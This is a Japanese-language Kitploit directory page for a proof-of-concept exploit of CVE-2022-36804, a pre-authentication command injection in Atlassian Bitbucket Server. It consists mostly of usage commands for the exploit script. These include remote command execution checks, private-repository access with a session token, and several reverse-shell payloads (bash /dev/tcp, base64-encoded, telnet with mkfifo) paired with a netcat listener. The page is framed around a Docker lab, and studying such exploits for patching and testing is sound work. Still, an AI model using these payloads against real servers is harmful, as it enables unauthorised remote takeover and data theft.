Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2022-36804 — Atlassian Bitbucket ServerおよびData Centerの複数のAPIエンドポイントにおいて、重大なコマンドインジェクションの脆弱性が発見されました。この脆弱性は、バージョン<7.6.17、<7.17.10、<7.21.4、<8.0.3、<8.1.2、<8.2.2、および<8.3.1より前にリリースされたすべてのバージョンのBitbucket ServerおよびData Centerに影響します。 | Kitploit
ツール/GitHubGitHub/walnutsecurity/cve-2022-36804
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールラボと実践
GitHubwalnutsecurity/cve-2022-36804

cve-2022-36804

Atlassian Bitbucket ServerおよびData Centerの複数のAPIエンドポイントにおいて、重大なコマンドインジェクションの脆弱性が発見されました。この脆弱性は、バージョン<7.6.17、<7.17.10、<7.21.4、<8.0.3、<8.1.2、<8.2.2、および<8.3.1より前にリリースされたすべてのバージョンのBitbucket ServerおよびData Centerに影響します。

リポジトリを見る
843年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-36804: Atlassian Bitbucket Server における事前認証RCE

Atlassian Bitbucket Server および Data Center の複数の API エンドポイントに、重大なコマンドインジェクションの脆弱性が発見されました。この脆弱性は、<7.6.17、<7.17.10、<7.21.4、<8.0.3、<8.1.2、<8.2.2、<8.3.1 より前にリリースされたすべてのバージョンの Bitbucket Server および Data Center に影響します。

CVE-2022-36804 のラボ環境

Docker のビルド

root@kitploit:~
docker build -t bitbucket .

Docker の実行

root@kitploit:~
docker run -it bitbucket

cve-2022-36804.py の使用方法

リモートコード実行 (RCE) の確認

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990

カスタマイズしたコマンド (cmd) で RCE を確認

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id

カスタマイズしたコマンド、プロジェクトキー、リポジトリ名で RCE を確認

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo

プライベートリポジトリの確認

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -p NEW -r newrepo --session 2074C8FFA5D13088332C8DF0CD8A7CE7

netcat でシェルを取得

172.17.0.3 をあなたのローカルIPアドレスに置き換えてください

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1"

次のコマンドで netcat リスナーを起動します:

root@kitploit:~
nc -lvp 4444

ペイロード実行エラーに備えて、/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1 を base64 に変換します。

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjMvNDQ0NCAwPiYx' | base64 -d | bash |"

それでもエラーが発生する場合は、以下のコマンドを実行してください:

TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF"

練習用として、Windows/Linux マシンに脆弱性のあるバージョンの Bitbucket Server をインストールすることをお勧めします。Docker イメージと比較して、リバースシェルを取得しやすくなります。

詳細はこちらをご覧ください。

参考情報

  • https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
  • https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
ツールをダウンロード